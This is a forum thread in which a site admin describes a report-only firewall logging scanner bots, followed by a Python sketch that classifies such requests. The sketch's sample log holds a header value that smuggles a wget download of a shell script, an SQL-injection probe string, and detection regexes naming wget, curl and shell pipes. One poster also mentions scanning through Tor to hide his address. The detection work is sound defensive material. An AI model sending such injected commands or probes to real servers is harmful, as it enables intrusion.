Suspicious Request Tracking

Azareal

A couple of years ago, I got bored and decided to throw together a crude, report-only web application firewall which basically logged away every suspicious request it detected. I also threw together a nice little graph so I could chart it all out.

It's not great for actual security, as WAFs are generally terrible at anything related to security, but it's nice to see what the bots are up to and to get some debug data from the occasional misbehaving browser or crawler.

Back in the day of 2018, I would get the occasional bot blasting me with 1K requests per second looking for vulnerabilities and not even bothering to conceal its identity (lol), but it seems they're a bit more subtle now.

Have you ever been curious about what suspicious or malicious activity has been hitting your site? How do you track it? Raw logs? WAF?
 
Have you been hit with nmap? Those are fun to run. I always run them with the discrete flag so the requests conceal themselves so my actual IP isn't released, because that's dumb. I mean I always use a VPN or TOR, so it's whatever but yeah.
 
https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=1.1.1.1
Tor is really easy to detect and block, not that I really bother lol

From the looks of it, sqlmap (the most useless thing in the world against prepared statements) came by once; it has some of the most distinctive-looking requests ever.
Bots that look for WordPress also came by (lol, I don't run WordPress), as well as ones which seem to fuzz random inputs.

zmap (sort of like nmap) also tended to come by very frequently, along with its app-level partner zgrab, which even has its own analytics pane.
There are also plenty of ones which squeak bits of shell code into headers, etc., probably trying to go after old Apache vulnerabilities.

I tried running nmap against myself once, a year ago, but it got eaten by the firewall, which was kind of unfortunate.
I used to get an avalanche of bots firing off all sorts of malformed requests, but most of them seem to be getting blocked now.

Kinda boring in a way; malicious bots are one of the few fun things to watch when administering a server.
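Azareal never posts the logger itself, so as an added sketch (not Azareal's code, and not tied to any particular forum software) here is how a report-only classifier for the traffic types named in this thread could look in Python: WordPress probes, sqlmap-style queries, zgrab/scanner user agents, shell metacharacters in headers, and Tor exits checked against a list in the one-IP-per-line shape of the TorBulkExitList link above. The log format, rule names, regexes and sample addresses are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlparse

# Constructed stand-in for a TorBulkExitList response (one IP per line, '#' comments); documentation addresses only.
TOR_EXIT_LIST = "# constructed\n192.0.2.10\n198.51.100.7\n"
TOR_EXITS = {l.strip() for l in TOR_EXIT_LIST.splitlines() if l.strip() and not l.startswith("#")}

# Report-only signatures for the traffic types the thread describes (constructed, not exhaustive).
WP_PATHS = ("/wp-login.php", "/wp-admin", "/xmlrpc.php", "/wp-content")
SCANNER_UA = re.compile(r"sqlmap|zgrab|nmap|nikto", re.I)
SQLI_HINT = re.compile(r"'|\bunion\b|\bselect\b|sleep\(|benchmark\(", re.I)
SHELL_HINT = re.compile(r"\$\{|\$\(|;\s*(?:wget|curl|sh|bash)\b|\|\s*(?:sh|bash)\b", re.I)

def parse_line(line):
    """Constructed tab-separated log line: ip, method, target, UA, headers as k=v pairs joined by '|'."""
    ip, method, target, ua, hdrs = line.rstrip("\n").split("\t")
    headers = dict(h.split("=", 1) for h in hdrs.split("|") if h)
    return {"ip": ip, "method": method, "target": target, "ua": ua, "headers": headers}

def classify(req):
    """Return the labels a request triggers; an empty set means nothing matched. Logs only, never blocks."""
    url = urlparse(req["target"])
    labels = set()
    if url.path.startswith(WP_PATHS):
        labels.add("wordpress-probe")
    if SCANNER_UA.search(req["ua"]):
        labels.add("scanner-ua")
    if SQLI_HINT.search(unquote(url.query)):  # decode %27 etc. before matching
        labels.add("sqli-probe")
    if any(SHELL_HINT.search(v) for v in req["headers"].values()):
        labels.add("shell-in-header")
    if req["ip"] in TOR_EXITS:
        labels.add("tor-exit")
    return labels

def tally(lines):
    """Per-label counts over a log: the numbers a chart like the one described above would plot."""
    counts = Counter()
    for line in lines:
        counts.update(classify(parse_line(line)))
    return counts

# Constructed sample traffic: a WordPress probe, an sqlmap-style query from a Tor exit, zgrab with shell text in a header, a normal hit.
SAMPLE_LOG = [
    "203.0.113.5\tGET\t/wp-login.php\tMozilla/5.0\tAccept=*/*",
    "198.51.100.7\tGET\t/search?q=1%27%20UNION%20SELECT%201\tsqlmap/1.4\tAccept=*/*",
    "192.0.2.10\tGET\t/\tMozilla/5.0 zgrab/0.x\tAccept=*/*|X-Probe=;wget http://example.invalid/a.sh",
    "203.0.113.9\tGET\t/topic/12\tMozilla/5.0 (Windows NT 10.0)\tAccept=text/html",
]
```

Running `tally(SAMPLE_LOG)` gives one WordPress probe, two scanner user agents, one SQLi hint, one shell-in-header hit and two Tor-exit requests; the plain browser line triggers nothing.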